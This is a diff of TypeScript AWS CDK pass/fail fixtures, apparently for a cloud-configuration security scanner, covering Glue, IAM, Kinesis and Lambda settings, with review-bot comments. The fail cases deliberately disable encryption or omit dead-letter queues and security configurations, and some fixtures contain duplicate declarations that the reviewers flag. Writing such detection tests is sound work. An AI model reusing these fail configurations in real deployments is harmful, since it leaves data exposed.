@@ -0,0 +1,31 @@ +import { aws_glue as glue } from 'aws-cdk-lib'; + +const cfnDataCatalogEncryptionSettings = new glue.CfnDataCatalogEncryptionSettings(this, 'MyCfnDataCatalogEncryptionSettings', { + catalogId: 'catalogId', + dataCatalogEncryptionSettings: { + connectionPasswordEncryption: { + kmsKeyId: 'kmsKeyId', + returnConnectionPasswordEncrypted: true, + }, + encryptionAtRest: { + catalogEncryptionMode: "SSE-KMS", + catalogEncryptionServiceRole: 'catalogEncryptionServiceRole', + sseAwsKmsKeyId: 'sseAwsKmsKeyId', + }, + }, +}); + +const cfnDataCatalogEncryptionSettingsProps: glue.CfnDataCatalogEncryptionSettingsProps = { + catalogId: 'catalogId', + dataCatalogEncryptionSettings: { + connectionPasswordEncryption: { + kmsKeyId: 'kmsKeyId', + returnConnectionPasswordEncrypted: true, + }, + encryptionAtRest: { + catalogEncryptionMode : "SSE-KMS", + catalogEncryptionServiceRole: 'catalogEncryptionServiceRole', + sseAwsKmsKeyId: 'sseAwsKmsKeyId', + }, + }, +}; \ No newline at end of file diff --git a/cdk_integration_tests/src/typescript/GlueSecurityConfiguration/fail.ts b/cdk_integration_tests/src/typescript/GlueSecurityConfiguration/fail.ts new file mode 100644 index 00000000000..785ee2482a9 --- /dev/null +++ b/cdk_integration_tests/src/typescript/GlueSecurityConfiguration/fail.ts 
@@ -0,0 +1,153 @@ +import { aws_glue as glue } from 'aws-cdk-lib'; + +const cfnSecurityConfigurationProps1: glue.CfnSecurityConfigurationProps = { + encryptionConfiguration: { + cloudWatchEncryption: { + cloudWatchEncryptionMode: 'SSE-KMS', + kmsKeyArn: 'kmsKeyArn', + }, + jobBookmarksEncryption: { + jobBookmarksEncryptionMode: 'DISABLE', + kmsKeyArn: 'kmsKeyArn', + }, + s3Encryptions: [], + }, + name: 'name', +}; + +const cfnSecurityConfigurationProps2: glue.CfnSecurityConfigurationProps = { + encryptionConfiguration: { + cloudWatchEncryption: { + cloudWatchEncryptionMode: 'SSE-KMS', + kmsKeyArn: 'kmsKeyArn', + }, + jobBookmarksEncryption: { + jobBookmarksEncryptionMode: 'DISABLE', + kmsKeyArn: 'kmsKeyArn', + }, + s3Encryptions: [{ s3EncryptionMode: "SSE-S3" }], + }, + name: 'name', +}; + +const cfnSecurityConfigurationProps3: glue.CfnSecurityConfigurationProps = { + encryptionConfiguration: { + cloudWatchEncryption: { + cloudWatchEncryptionMode: 'SSE-KMS', + kmsKeyArn: 'kmsKeyArn', + }, + jobBookmarksEncryption: { + jobBookmarksEncryptionMode: 'DISABLE', + kmsKeyArn: 'kmsKeyArn', + }, + s3Encryptions: [{ s3EncryptionMode: "SSE-KMS" }], + }, + name: 'name', +}; + +const cfnSecurityConfigurationProps4: glue.CfnSecurityConfigurationProps = { + encryptionConfiguration: { + cloudWatchEncryption: { + cloudWatchEncryptionMode: 'SSE-KMS', + kmsKeyArn: 'kmsKeyArn', + }, + jobBookmarksEncryption: { + jobBookmarksEncryptionMode: 'DISABLE', + kmsKeyArn: 'kmsKeyArn', + }, + s3Encryptions: [{ s3EncryptionMode: "DISABLE" }], + }, + name: 'name', +}; + +const cfnSecurityConfigurationProps5: glue.CfnSecurityConfigurationProps = { + encryptionConfiguration: { + cloudWatchEncryption: { + cloudWatchEncryptionMode: 'DISABLE', + kmsKeyArn: 'kmsKeyArn', + }, + jobBookmarksEncryption: { + jobBookmarksEncryptionMode: 'CSE-KMS', + kmsKeyArn: 'kmsKeyArn', + }, + s3Encryptions: [{ s3EncryptionMode: "DISABLE" }], + }, + name: 'name', +}; + +const cfnSecurityConfigurationProps6: 
glue.CfnSecurityConfigurationProps = { + encryptionConfiguration: { + cloudWatchEncryption: { + cloudWatchEncryptionMode: 'DISABLE', + kmsKeyArn: 'kmsKeyArn', + }, + jobBookmarksEncryption: { + jobBookmarksEncryptionMode: 'CSE-KMS', + kmsKeyArn: 'kmsKeyArn', + }, + s3Encryptions: [{ s3EncryptionMode: "SSE-S3" }], + }, + name: 'name', +}; + +const cfnSecurityConfigurationProps7: glue.CfnSecurityConfigurationProps = { + encryptionConfiguration: { + cloudWatchEncryption: { + cloudWatchEncryptionMode: 'DISABLE', + kmsKeyArn: 'kmsKeyArn', + }, + jobBookmarksEncryption: { + jobBookmarksEncryptionMode: 'CSE-KMS', + kmsKeyArn: 'kmsKeyArn', + }, + s3Encryptions: [{ s3EncryptionMode: "SSE-KMS" }], + }, + name: 'name', +}; + +const cfnSecurityConfigurationProps8: glue.CfnSecurityConfigurationProps = { + encryptionConfiguration: { + cloudWatchEncryption: { + cloudWatchEncryptionMode: 'SSE-KMS', + kmsKeyArn: 'kmsKeyArn', + }, + jobBookmarksEncryption: { + jobBookmarksEncryptionMode: 'CSE-KMS', + kmsKeyArn: 'kmsKeyArn', + }, + s3Encryptions: [{ s3EncryptionMode: "DISABLE" }], + }, + name: 'name', +}; + +const cfnSecurityConfigurationProps9: glue.CfnSecurityConfigurationProps = { + encryptionConfiguration: { + cloudWatchEncryption: { + cloudWatchEncryptionMode: 'SSE-KMS', + kmsKeyArn: 'kmsKeyArn', + }, + jobBookmarksEncryption: { + jobBookmarksEncryptionMode: 'CSE-KMS', + kmsKeyArn: 'kmsKeyArn', + }, + s3Encryptions: [{ s3EncryptionMode: "SSE-KMS" }], + }, + name: 'name', +}; + +const cfnSecurityConfigurationProps10: glue.CfnSecurityConfigurationProps = { + encryptionConfiguration: { + cloudWatchEncryption: { + cloudWatchEncryptionMode: 'SSE-KMS', + kmsKeyArn: 'kmsKeyArn', + }, + jobBookmarksEncryption: { + jobBookmarksEncryptionMode: 'CSE-KMS', + kmsKeyArn: 'kmsKeyArn', + }, + s3Encryptions: [{ s3EncryptionMode: "SSE-S3" }], + }, + name: 'name', +}; + + 
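Review bot: `cfnSecurityConfigurationProps9` and `cfnSecurityConfigurationProps10` differ from the two passing resources in pass.ts only in that their `s3Encryptions` entry has no `kmsKeyArn`, so the fixture encodes that `{ s3EncryptionMode: "SSE-S3" }` without a key ARN must fail, although SSE-S3 uses S3-managed keys and has no customer key to name. I cannot see the policy from this hunk; if that is really the intended rule, a short comment above each of the ten near-identical blocks naming the condition it violates (e.g. `// fails: jobBookmarksEncryptionMode DISABLE`) would make the file reviewable, and if it is not, props10 here and `cfnSecurityConfiguration10` in fail2.ts belong in pass.ts. fail2.ts of this directory mirrors these cases one-for-one, so whatever is decided applies there too.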
diff --git a/cdk_integration_tests/src/typescript/GlueSecurityConfiguration/fail2.ts b/cdk_integration_tests/src/typescript/GlueSecurityConfiguration/fail2.ts new file mode 100644 index 00000000000..71e304ded6a --- /dev/null +++ b/cdk_integration_tests/src/typescript/GlueSecurityConfiguration/fail2.ts 
@@ -0,0 +1,153 @@ +import { aws_glue as glue } from 'aws-cdk-lib'; + +const cfnSecurityConfiguration1 = new glue.CfnSecurityConfiguration(this, 'MyCfnSecurityConfiguration', { + encryptionConfiguration: { + cloudWatchEncryption: { + cloudWatchEncryptionMode: 'SSE-KMS', + kmsKeyArn: 'kmsKeyArn', + }, + jobBookmarksEncryption: { + jobBookmarksEncryptionMode: 'DISABLE', + kmsKeyArn: 'kmsKeyArn', + }, + s3Encryptions: [], + }, + name: 'name', +}); + +const cfnSecurityConfiguration2 = new glue.CfnSecurityConfiguration(this, 'MyCfnSecurityConfiguration', { + encryptionConfiguration: { + cloudWatchEncryption: { + cloudWatchEncryptionMode: 'SSE-KMS', + kmsKeyArn: 'kmsKeyArn', + }, + jobBookmarksEncryption: { + jobBookmarksEncryptionMode: 'DISABLE', + kmsKeyArn: 'kmsKeyArn', + }, + s3Encryptions: [{ s3EncryptionMode: "SSE-S3" }], + }, + name: 'name', +}); + +const cfnSecurityConfiguration3 = new glue.CfnSecurityConfiguration(this, 'MyCfnSecurityConfiguration', { + encryptionConfiguration: { + cloudWatchEncryption: { + cloudWatchEncryptionMode: 'SSE-KMS', + kmsKeyArn: 'kmsKeyArn', + }, + jobBookmarksEncryption: { + jobBookmarksEncryptionMode: 'DISABLE', + kmsKeyArn: 'kmsKeyArn', + }, + s3Encryptions: [{ s3EncryptionMode: "SSE-KMS" }], + }, + name: 'name', +}); + +const cfnSecurityConfiguration4 = new glue.CfnSecurityConfiguration(this, 'MyCfnSecurityConfiguration', { + encryptionConfiguration: { + cloudWatchEncryption: { + cloudWatchEncryptionMode: 'SSE-KMS', + kmsKeyArn: 'kmsKeyArn', + }, + jobBookmarksEncryption: { + jobBookmarksEncryptionMode: 'DISABLE', + kmsKeyArn: 'kmsKeyArn', + }, + s3Encryptions: [{ s3EncryptionMode: "DISABLE" }], + }, + name: 'name', +}); + +const cfnSecurityConfiguration5 = new glue.CfnSecurityConfiguration(this, 'MyCfnSecurityConfiguration', { + encryptionConfiguration: { + cloudWatchEncryption: { + cloudWatchEncryptionMode: 'DISABLE', + kmsKeyArn: 'kmsKeyArn', + }, + jobBookmarksEncryption: { + jobBookmarksEncryptionMode: 'CSE-KMS', + kmsKeyArn: 
'kmsKeyArn', + }, + s3Encryptions: [{ s3EncryptionMode: "DISABLE" }], + }, + name: 'name', +}); + +const cfnSecurityConfiguration6 = new glue.CfnSecurityConfiguration(this, 'MyCfnSecurityConfiguration', { + encryptionConfiguration: { + cloudWatchEncryption: { + cloudWatchEncryptionMode: 'DISABLE', + kmsKeyArn: 'kmsKeyArn', + }, + jobBookmarksEncryption: { + jobBookmarksEncryptionMode: 'CSE-KMS', + kmsKeyArn: 'kmsKeyArn', + }, + s3Encryptions: [{ s3EncryptionMode: "SSE-S3" }], + }, + name: 'name', +}); + +const cfnSecurityConfiguration7 = new glue.CfnSecurityConfiguration(this, 'MyCfnSecurityConfiguration', { + encryptionConfiguration: { + cloudWatchEncryption: { + cloudWatchEncryptionMode: 'DISABLE', + kmsKeyArn: 'kmsKeyArn', + }, + jobBookmarksEncryption: { + jobBookmarksEncryptionMode: 'CSE-KMS', + kmsKeyArn: 'kmsKeyArn', + }, + s3Encryptions: [{ s3EncryptionMode: "SSE-KMS" }], + }, + name: 'name', +}); + +const cfnSecurityConfiguration8 = new glue.CfnSecurityConfiguration(this, 'MyCfnSecurityConfiguration', { + encryptionConfiguration: { + cloudWatchEncryption: { + cloudWatchEncryptionMode: 'SSE-KMS', + kmsKeyArn: 'kmsKeyArn', + }, + jobBookmarksEncryption: { + jobBookmarksEncryptionMode: 'CSE-KMS', + kmsKeyArn: 'kmsKeyArn', + }, + s3Encryptions: [{ s3EncryptionMode: "DISABLE" }], + }, + name: 'name', +}); + +const cfnSecurityConfiguration9 = new glue.CfnSecurityConfiguration(this, 'MyCfnSecurityConfiguration', { + encryptionConfiguration: { + cloudWatchEncryption: { + cloudWatchEncryptionMode: 'SSE-KMS', + kmsKeyArn: 'kmsKeyArn', + }, + jobBookmarksEncryption: { + jobBookmarksEncryptionMode: 'CSE-KMS', + kmsKeyArn: 'kmsKeyArn', + }, + s3Encryptions: [{ s3EncryptionMode: "SSE-KMS" }], + }, + name: 'name', +}); + +const cfnSecurityConfiguration10 = new glue.CfnSecurityConfiguration(this, 'MyCfnSecurityConfiguration', { + encryptionConfiguration: { + cloudWatchEncryption: { + cloudWatchEncryptionMode: 'SSE-KMS', + kmsKeyArn: 'kmsKeyArn', + }, + 
jobBookmarksEncryption: { + jobBookmarksEncryptionMode: 'CSE-KMS', + kmsKeyArn: 'kmsKeyArn', + }, + s3Encryptions: [{ s3EncryptionMode: "SSE-S3" }], + }, + name: 'name', +}); + + diff --git a/cdk_integration_tests/src/typescript/GlueSecurityConfiguration/pass.ts b/cdk_integration_tests/src/typescript/GlueSecurityConfiguration/pass.ts new file mode 100644 index 00000000000..fe0e51f8b5e --- /dev/null +++ b/cdk_integration_tests/src/typescript/GlueSecurityConfiguration/pass.ts @@ -0,0 +1,52 @@ +import { aws_glue as glue } from 'aws-cdk-lib'; + +const cfnSecurityConfiguration = new glue.CfnSecurityConfiguration(this, 'MyCfnSecurityConfiguration', { + encryptionConfiguration: { + cloudWatchEncryption: { + cloudWatchEncryptionMode: 'SSE-KMS', + kmsKeyArn: 'kmsKeyArn', + }, + jobBookmarksEncryption: { + jobBookmarksEncryptionMode: 'CSE-KMS', + kmsKeyArn: 'kmsKeyArn', + }, + s3Encryptions: [{ + kmsKeyArn: 'kmsKeyArn', + s3EncryptionMode: 'SSE-KMS', + }], + }, + name: 'name', +}); + +const cfnSecurityConfiguration2 = new glue.CfnSecurityConfiguration(this, 'MyCfnSecurityConfiguration', { + encryptionConfiguration: { + cloudWatchEncryption: { + cloudWatchEncryptionMode: 'SSE-KMS', + kmsKeyArn: 'kmsKeyArn', + }, + jobBookmarksEncryption: { + jobBookmarksEncryptionMode: 'CSE-KMS', + kmsKeyArn: 'kmsKeyArn', + }, + s3Encryptions: [{ + kmsKeyArn: 'kmsKeyArn', + s3EncryptionMode: 'SSE-S3', + }], + }, + name: 'name', +}); + +const cfnDataCatalogEncryptionSettingsProps: glue.CfnDataCatalogEncryptionSettingsProps = { + catalogId: 'catalogId', + dataCatalogEncryptionSettings: { + connectionPasswordEncryption: { + kmsKeyId: 'kmsKeyId', + returnConnectionPasswordEncrypted: true, + }, + encryptionAtRest: { + catalogEncryptionMode : "SSE-KMS", + catalogEncryptionServiceRole: 'catalogEncryptionServiceRole', + sseAwsKmsKeyId: 'sseAwsKmsKeyId', + }, + }, +}; 
diff --git a/cdk_integration_tests/src/typescript/GlueSecurityConfigurationEnabled/fail.ts b/cdk_integration_tests/src/typescript/GlueSecurityConfigurationEnabled/fail.ts new file mode 100644 index 00000000000..2243177e218 --- /dev/null +++ b/cdk_integration_tests/src/typescript/GlueSecurityConfigurationEnabled/fail.ts @@ -0,0 +1,13 @@ +import { aws_glue as glue } from 'aws-cdk-lib'; + +const cfnSecurityConfigurationProps1: glue.CfnCrawlerProps = { + name: 'name', +}; + +const cfnSecurityConfigurationProps2: glue.CfnDevEndpointProps = { + name: 'name', +}; + +const cfnSecurityConfigurationProps3: glue.CfnJobProps = { + name: 'name', +}; diff --git a/cdk_integration_tests/src/typescript/GlueSecurityConfigurationEnabled/fail2.ts b/cdk_integration_tests/src/typescript/GlueSecurityConfigurationEnabled/fail2.ts new file mode 100644 index 00000000000..d98a98bee78 --- /dev/null +++ b/cdk_integration_tests/src/typescript/GlueSecurityConfigurationEnabled/fail2.ts @@ -0,0 +1,13 @@ +import { aws_glue as glue } from 'aws-cdk-lib'; + +const cfnSecurityConfiguration1 = new glue.CfnCrawler(this, 'MyCfnSecurityConfiguration', { + name: 'name', +}); + +const cfnSecurityConfiguration2 = new glue.CfnDevEndpoint(this, 'MyCfnSecurityConfiguration', { + name: 'name', +}); + +const cfnSecurityConfiguration3 = new glue.CfnJob(this, 'MyCfnSecurityConfiguration', { + name: 'name', +}); diff --git a/cdk_integration_tests/src/typescript/GlueSecurityConfigurationEnabled/pass.ts b/cdk_integration_tests/src/typescript/GlueSecurityConfigurationEnabled/pass.ts new file mode 100644 index 00000000000..996755eaeae --- /dev/null +++ b/cdk_integration_tests/src/typescript/GlueSecurityConfigurationEnabled/pass.ts 
@@ -0,0 +1,32 @@ +import {aws_glue as glue} from 'aws-cdk-lib'; + +const cfnSecurityConfiguration1 = new glue.CfnCrawler(this, 'MyCfnSecurityConfiguration', { + crawlerSecurityConfiguration: 'securityConfiguration', + name: 'name', +}); + +const cfnSecurityConfiguration2 = new glue.CfnDevEndpoint(this, 'MyCfnSecurityConfiguration', { + securityConfiguration: 'securityConfiguration', + name: 'name', +}); + +const cfnSecurityConfiguration3 = new glue.CfnJob(this, 'MyCfnSecurityConfiguration', { + securityConfiguration: 'securityConfiguration', + name: 'name', +}); + +const cfnSecurityConfigurationProps1: glue.CfnCrawlerProps = { + name: 'name', + crawlerSecurityConfiguration: 'securityConfiguration', +}; + +const cfnSecurityConfigurationProps2: glue.CfnDevEndpointProps = { + name: 'name', + securityConfiguration: 'securityConfiguration', +}; + +const cfnSecurityConfigurationProps3: glue.CfnJobProps = { + name: 'name', + securityConfiguration: 'securityConfiguration', +}; + diff --git a/cdk_integration_tests/src/typescript/IAMPolicyAttachedToGroupOrRoles/fail.ts b/cdk_integration_tests/src/typescript/IAMPolicyAttachedToGroupOrRoles/fail.ts new file mode 100644 index 00000000000..0e657cf3590 --- /dev/null +++ b/cdk_integration_tests/src/typescript/IAMPolicyAttachedToGroupOrRoles/fail.ts @@ -0,0 +1,6 @@ +import { aws_iam as iam } from 'aws-cdk-lib'; + +const cfnSecurityConfigurationProps1: iam.PolicyProps = { + statements: [{}], + users: [{}] +}; diff --git a/cdk_integration_tests/src/typescript/IAMPolicyAttachedToGroupOrRoles/fail2.ts b/cdk_integration_tests/src/typescript/IAMPolicyAttachedToGroupOrRoles/fail2.ts new file mode 100644 index 00000000000..647d7c4c6f4 --- /dev/null +++ b/cdk_integration_tests/src/typescript/IAMPolicyAttachedToGroupOrRoles/fail2.ts 
@@ -0,0 +1,26 @@ +import { aws_iam as iam } from 'aws-cdk-lib'; + +const a = new iam.Policy(this, 'userpool-policy', { + statements: [new iam.PolicyStatement({ + actions: ['cognito-idp:DescribeUserPool'], + resources: ['Arn'], + })], + users: ['sdsd'] +}); + +const b = new iam.Policy(this, 'userpool-policy', { + statements: [new iam.PolicyStatement({ + actions: ['cognito-idp:DescribeUserPool'], + resources: ['Arn'], + })], +}); +console.log('dsd') +b.attachToUser({}) + +const c = new iam.Policy(this, 'userpool-policy', { + statements: [new iam.PolicyStatement({ + actions: ['cognito-idp:DescribeUserPool'], + resources: ['Arn'], + })], +}); +c.attachToUser({}) \ No newline at end of file diff --git a/cdk_integration_tests/src/typescript/IAMPolicyAttachedToGroupOrRoles/pass.ts b/cdk_integration_tests/src/typescript/IAMPolicyAttachedToGroupOrRoles/pass.ts new file mode 100644 index 00000000000..6697828bc2e --- /dev/null +++ b/cdk_integration_tests/src/typescript/IAMPolicyAttachedToGroupOrRoles/pass.ts @@ -0,0 +1,15 @@ +import { aws_iam as iam } from 'aws-cdk-lib'; + +const a = new iam.Policy(this, 'userpool-policy', { + statements: [new iam.PolicyStatement({ + actions: ['cognito-idp:DescribeUserPool'], + resources: ['Arn'], + })], +}); + +const cfnSecurityConfigurationProps1: iam.PolicyProps = { + statements: [new iam.PolicyStatement({ + actions: ['cognito-idp:DescribeUserPool'], + resources: ['Arn'], + })], +}; diff --git a/cdk_integration_tests/src/typescript/KinesisStreamEncryptionType/fail.ts b/cdk_integration_tests/src/typescript/KinesisStreamEncryptionType/fail.ts new file mode 100644 index 00000000000..20232b10244 --- /dev/null +++ b/cdk_integration_tests/src/typescript/KinesisStreamEncryptionType/fail.ts 
@@ -0,0 +1,10 @@ +import { aws_kinesis as kinesis } from 'aws-cdk-lib'; + +const cfnSecurityConfigurationProps1: kinesis.CfnStreamProps = { + streamEncryption: { encryptionType: "None", keyId: "dfdf"}, + name: 'name', +}; + +const cfnSecurityConfigurationProps2: kinesis.CfnStreamProps = { + name: 'name', +}; diff --git a/cdk_integration_tests/src/typescript/KinesisStreamEncryptionType/fail2.ts b/cdk_integration_tests/src/typescript/KinesisStreamEncryptionType/fail2.ts new file mode 100644 index 00000000000..5afeac9376a --- /dev/null +++ b/cdk_integration_tests/src/typescript/KinesisStreamEncryptionType/fail2.ts @@ -0,0 +1,10 @@ +import { aws_kinesis as kinesis } from 'aws-cdk-lib'; + +const cfnSecurityConfiguration1 = new kinesis.CfnStream(this, 'MyCfnSecurityConfiguration', { + streamEncryption: { encryptionType: "None", keyId: "dfdf"}, + name: 'name', +}); + +const cfnSecurityConfiguration2 = new kinesis.CfnStream(this, 'MyCfnSecurityConfiguration', { + name: 'name', +}); diff --git a/cdk_integration_tests/src/typescript/KinesisStreamEncryptionType/pass.ts b/cdk_integration_tests/src/typescript/KinesisStreamEncryptionType/pass.ts new file mode 100644 index 00000000000..815a69069e1 --- /dev/null +++ b/cdk_integration_tests/src/typescript/KinesisStreamEncryptionType/pass.ts @@ -0,0 +1,6 @@ +import { aws_kinesis as kinesis } from 'aws-cdk-lib'; + +const cfnSecurityConfigurationProps1: kinesis.CfnStreamProps = { + streamEncryption: { encryptionType: "KMS", keyId: "dfdf"}, + name: 'name', +}; diff --git a/cdk_integration_tests/src/typescript/LambdaDLQConfigured/fail.ts b/cdk_integration_tests/src/typescript/LambdaDLQConfigured/fail.ts new file mode 100644 index 00000000000..f6c67f57e14 --- /dev/null +++ b/cdk_integration_tests/src/typescript/LambdaDLQConfigured/fail.ts 
@@ -0,0 +1,16 @@
+import { aws_lambda as lambda } from 'aws-cdk-lib';
+import { aws_sam as sam } from 'aws-cdk-lib';
+
+const cfnSecurityConfigurationProps1: lambda.FunctionProps = {
+ name: 'name',
+ role: "",
+};
+
+const cfnSecurityConfigurationProps1: lambda.CfnFunctionProps = {
+ name: 'name',
+ role: "",
+};
+
+const cfnSecurityConfigurationProps2: sam.CfnFunctionProps = {
+ name: 'name',
+};
diff --git a/cdk_integration_tests/src/typescript/LambdaDLQConfigured/fail2.ts b/cdk_integration_tests/src/typescript/LambdaDLQConfigured/fail2.ts
new file mode 100644
index 00000000000..78e459dc77d
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/LambdaDLQConfigured/fail2.ts
@@ -0,0 +1,17 @@
+import { aws_lambda as lambda } from 'aws-cdk-lib';
+import { aws_sam as sam } from 'aws-cdk-lib';
+
+const cfnSecurityConfiguration1 = new lambda.Function(this, 'MyCfnSecurityConfiguration', {
+ role: "",
+ name: 'name',
+});
+
+const cfnSecurityConfiguration2 = new lambda.CfnFunction(this, 'MyCfnSecurityConfiguration', {
+ role: "",
+ name: 'name',
+});
+
+const cfnSecurityConfiguration3 = new sam.CfnFunction(this, 'MyCfnSecurityConfiguration', {
+ role: "",
+ name: 'name',
+});
diff --git a/cdk_integration_tests/src/typescript/LambdaDLQConfigured/pass.ts b/cdk_integration_tests/src/typescript/LambdaDLQConfigured/pass.ts
new file mode 100644
index 00000000000..ac1785db264
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/LambdaDLQConfigured/pass.ts
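Review bot: `cfnSecurityConfigurationProps1` is declared twice with `const` in LambdaDLQConfigured/fail.ts (once as `lambda.FunctionProps`, once as `lambda.CfnFunctionProps`), which is a redeclaration error in TypeScript; rename the second to `cfnSecurityConfigurationProps2` and the `sam.CfnFunctionProps` one to `cfnSecurityConfigurationProps3`. pass.ts (the next file) has the same problem with `cfnSecurityConfiguration2` used for both the `lambda.CfnFunction` and the `sam.CfnFunction` resources. Whether the fixture still works presumably depends on the scanner not type-checking, so it passes by accident rather than by design.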
@@ -0,0 +1,21 @@
+import {aws_lambda as lambda} from 'aws-cdk-lib';
+import {aws_sam as sam} from 'aws-cdk-lib';
+
+const cfnSecurityConfiguration1 = new lambda.Function(this, 'MyCfnSecurityConfiguration', {
+ role: "",
+ name: 'name',
+ deadLetterQueue: {},
+ deadLetterQueueEnabled: true,
+});
+
+const cfnSecurityConfiguration2 = new lambda.CfnFunction(this, 'MyCfnSecurityConfiguration', {
+ role: "",
+ name: 'name',
+ deadLetterConfig: {},
+});
+
+const cfnSecurityConfiguration2 = new sam.CfnFunction(this, 'MyCfnSecurityConfiguration', {
+ role: "",
+ name: 'name',
+ deadLetterQueue: {},
+});
\ No newline at end of file
diff --git a/cdk_integration_tests/src/typescript/LambdaEnvironmentCredentials/fail.ts b/cdk_integration_tests/src/typescript/LambdaEnvironmentCredentials/fail.ts
new file mode 100644
index 00000000000..16236a09dab
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/LambdaEnvironmentCredentials/fail.ts
@@ -0,0 +1,29 @@
+import {aws_lambda as lambda} from 'aws-cdk-lib';
+import {aws_sam as sam} from 'aws-cdk-lib';
+
+const cfnSecurityConfigurationProps1: lambda.FunctionProps = {
+ name: 'name',
+ role: "",
+ environment: {
+ "bla": "bla",
+ }
+};
+
+const cfnSecurityConfigurationProps2: lambda.CfnFunctionProps = {
+ name: 'name',
+ role: "",
+ environment: {
+ variables: {
+ "bla": "bla",
+ }
+ }
+};
+
+const cfnSecurityConfigurationProps3: sam.CfnFunctionProps = {
+ name: 'name',
+ environment: {
+ variables: {
+ bla: "bla",
+ }
+ }
+};
diff --git a/cdk_integration_tests/src/typescript/LambdaEnvironmentCredentials/fail2.ts b/cdk_integration_tests/src/typescript/LambdaEnvironmentCredentials/fail2.ts
new file mode 100644
index 00000000000..1e3b04d006f
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/LambdaEnvironmentCredentials/fail2.ts
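Review bot: the LambdaEnvironmentCredentials fail fixture contains nothing credential-like — its only environment variable is `"bla": "bla"` — and the identical blob (index 16236a09dab) is also checked in as fail.ts for LambdaEnvironmentEncryptionSettings, LambdaFunctionLevelConcurrentExecutionLimit and LambdaInVPC, with fail2.ts (index 1e3b04d006f) shared the same way. If this check is meant to flag hard-coded secrets in Lambda environment variables, the only thing separating fail from pass here is the `kmsKeyArn` / `environmentEncryption` present in pass.ts, which is the encryption-settings condition rather than a credentials condition, so the test may be pinning the wrong behaviour. Consider giving this fixture a variable whose name and value look like a secret, e.g. `AWS_SECRET_ACCESS_KEY: "<placeholder-secret-value>"`, and a pass variant that keeps ordinary env vars without a secret-looking value.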
@@ -0,0 +1,30 @@
+import { aws_lambda as lambda } from 'aws-cdk-lib';
+import { aws_sam as sam } from 'aws-cdk-lib';
+
+const cfnSecurityConfiguration1 = new lambda.Function(this, 'MyCfnSecurityConfiguration', {
+ role: "",
+ name: 'name',
+ environment: {
+ "bla": "bla",
+ }
+});
+
+const cfnSecurityConfiguration2 = new lambda.CfnFunction(this, 'MyCfnSecurityConfiguration', {
+ role: "",
+ name: 'name',
+ environment: {
+ variables: {
+ "bla": "bla",
+ }
+ }
+});
+
+const cfnSecurityConfiguration3 = new sam.CfnFunction(this, 'MyCfnSecurityConfiguration', {
+ role: "",
+ name: 'name',
+ environment: {
+ variables: {
+ bla: "bla",
+ }
+ }
+});
diff --git a/cdk_integration_tests/src/typescript/LambdaEnvironmentCredentials/pass.ts b/cdk_integration_tests/src/typescript/LambdaEnvironmentCredentials/pass.ts
new file mode 100644
index 00000000000..53fd9d05779
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/LambdaEnvironmentCredentials/pass.ts
@@ -0,0 +1,63 @@
+import {aws_lambda as lambda} from 'aws-cdk-lib';
+import {aws_sam as sam} from 'aws-cdk-lib';
+
+const cfnSecurityConfiguration1 = new lambda.Function(this, 'MyCfnSecurityConfiguration', {
+ role: "",
+ name: 'name',
+ environment: {
+ "bla": "bla",
+ },
+ environmentEncryption: {}
+});
+
+const cfnSecurityConfiguration2 = new lambda.CfnFunction(this, 'MyCfnSecurityConfiguration', {
+ role: "",
+ name: 'name',
+ environment: {
+ variables: {
+ "bla": "bla",
+ }
+ },
+ kmsKeyArn: "arn"
+});
+
+const cfnSecurityConfiguration3 = new sam.CfnFunction(this, 'MyCfnSecurityConfiguration', {
+ role: "",
+ name: 'name',
+ environment: {
+ variables: {
+ bla: "bla",
+ }
+ },
+ kmsKeyArn: "arn"
+});
+
+const cfnSecurityConfigurationProps1: lambda.FunctionProps = {
+ name: 'name',
+ role: "",
+ environment: {
+ "bla": "bla",
+ },
+ environmentEncryption: {}
+};
+
+const cfnSecurityConfigurationProps2: lambda.CfnFunctionProps = {
+ name: 'name',
+ role: "",
+ environment: {
+ variables: {
+ "bla": "bla",
+ }
+ },
+ kmsKeyArn: "arn"
+};
+
+const cfnSecurityConfigurationProps3: sam.CfnFunctionProps = {
+ name: 'name',
+ environment: {
+ variables: {
+ bla: "bla",
+ }
+ },
+ kmsKeyArn: "arn"
+};
diff --git a/cdk_integration_tests/src/typescript/LambdaEnvironmentEncryptionSettings/fail.ts b/cdk_integration_tests/src/typescript/LambdaEnvironmentEncryptionSettings/fail.ts
new file mode 100644
index 00000000000..16236a09dab
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/LambdaEnvironmentEncryptionSettings/fail.ts
@@ -0,0 +1,29 @@
+import {aws_lambda as lambda} from 'aws-cdk-lib';
+import {aws_sam as sam} from 'aws-cdk-lib';
+
+const cfnSecurityConfigurationProps1: lambda.FunctionProps = {
+ name: 'name',
+ role: "",
+ environment: {
+ "bla": "bla",
+ }
+};
+
+const cfnSecurityConfigurationProps2: lambda.CfnFunctionProps = {
+ name: 'name',
+ role: "",
+ environment: {
+ variables: {
+ "bla": "bla",
+ }
+ }
+};
+
+const cfnSecurityConfigurationProps3: sam.CfnFunctionProps = {
+ name: 'name',
+ environment: {
+ variables: {
+ bla: "bla",
+ }
+ }
+};
diff --git a/cdk_integration_tests/src/typescript/LambdaEnvironmentEncryptionSettings/fail2.ts b/cdk_integration_tests/src/typescript/LambdaEnvironmentEncryptionSettings/fail2.ts
new file mode 100644
index 00000000000..7b177449acd
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/LambdaEnvironmentEncryptionSettings/fail2.ts
@@ -0,0 +1,30 @@
+import { aws_lambda as lambda } from 'aws-cdk-lib';
+import { aws_sam as sam } from 'aws-cdk-lib';
+
+const cfnSecurityConfiguration1 = new lambda.Function(this, 'MyCfnSecurityConfiguration', {
+ role: "",
+ name: 'name',
+ environment: {
+ "bla": "bla",
+ },
+});
+
+const cfnSecurityConfiguration2 = new lambda.CfnFunction(this, 'MyCfnSecurityConfiguration', {
+ role: "",
+ name: 'name',
+ environment: {
+ variables: {
+ "bla": "bla",
+ }
+ }
+});
+
+const cfnSecurityConfiguration3 = new sam.CfnFunction(this, 'MyCfnSecurityConfiguration', {
+ role: "",
+ name: 'name',
+ environment: {
+ variables: {
+ bla: "bla",
+ }
+ }
+});
diff --git a/cdk_integration_tests/src/typescript/LambdaEnvironmentEncryptionSettings/pass.ts b/cdk_integration_tests/src/typescript/LambdaEnvironmentEncryptionSettings/pass.ts
new file mode 100644
